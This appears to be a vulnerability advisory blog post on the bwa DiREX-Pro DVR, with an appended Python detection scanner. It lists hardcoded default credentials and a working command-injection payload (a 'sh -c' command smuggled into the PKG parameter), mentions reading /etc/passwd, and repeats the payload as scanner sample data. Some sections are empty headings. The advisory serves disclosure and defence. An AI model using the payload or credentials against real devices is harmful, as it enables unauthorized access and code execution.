Saturday, March 7, 2020

[bwa] Multiple vulnerabilities in "DiREX-Pro"

Multiple unauthenticated vulnerabilities in a DVR device from vendor bwa (http://www.meinbwa.de)

Vulnerable model: DiREX-Pro


POCS: 


1) Full Path Disclosure (FPD)

Triggered by sending crafted HTTP requests.




2) Hardcoded passwords



USER      PASSWORD
===================
user      user
archive   archive
admin     admin


3) Remote Code Execution (RCE):

First, the firmware needs to be downloaded:




Decompiled firmware analysis





PAYLOAD: 
PKG=;sh -c '/bin/ls -la /usr/local/www/cgi-bin/>/usr/local/www/out2';# 


Response



Other example: read /etc/passwd
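As an added detection example (not part of the original advisory), the following Python scanner flags requests that carry shell metacharacters in the PKG parameter, as in the payload above, and logins that use the factory credentials listed earlier. The package-name allowlist and the user/pass field names are assumptions; the advisory does not document the real formats.

```python
import re
from urllib.parse import unquote_plus

# Characters that chain or terminate a shell command: the advisory's payload
# uses ';' to break out of the command the CGI builds around PKG.
SHELL_META = re.compile(r"[;|&`$\n\r]")
# Allowlist for a legitimate package identifier (assumption: the advisory does
# not document the real format, so this is a conservative placeholder).
PKG_OK = re.compile(r"^[A-Za-z0-9._-]{1,64}$")
# Factory credentials listed in the advisory.
DEFAULT_CREDS = {("user", "user"), ("archive", "archive"), ("admin", "admin")}


def parse_form(data):
    """Split x-www-form-urlencoded data into (name, value) pairs.

    Only '&' separates fields, so a ';' stays inside the value it belongs to.
    """
    pairs = []
    for field in data.split("&"):
        if field:
            name, _, value = field.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def scan_request(query, body=""):
    """Return findings for one request: PKG injection or default credentials."""
    findings = []
    params = parse_form(query) + parse_form(body)
    for name, value in params:
        if name.upper() == "PKG" and not PKG_OK.match(value):
            kind = "command_injection" if SHELL_META.search(value) else "invalid_pkg"
            findings.append((kind, name, value))
    creds = dict(params)
    user = creds.get("user") or creds.get("username")
    pw = creds.get("pass") or creds.get("password")
    if (user, pw) in DEFAULT_CREDS:
        findings.append(("default_credentials", user, "***"))
    return findings


# Constructed sample traffic (not captured from a device): the advisory's
# payload URL-encoded as a POST body, a benign value, and a default login.
SAMPLE = [
    ("", "PKG=%3Bsh+-c+%27%2Fbin%2Fls+-la+%2Fusr%2Flocal%2Fwww%2Fcgi-bin%2F"
         "%3E%2Fusr%2Flocal%2Fwww%2Fout2%27%3B%23"),
    ("", "PKG=firmware-update-1.2"),
    ("user=admin&pass=admin", ""),
]
```

Running scan_request over each entry of SAMPLE reports the first as command_injection, the second as clean, and the third as default_credentials.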



Regards,

 
biz.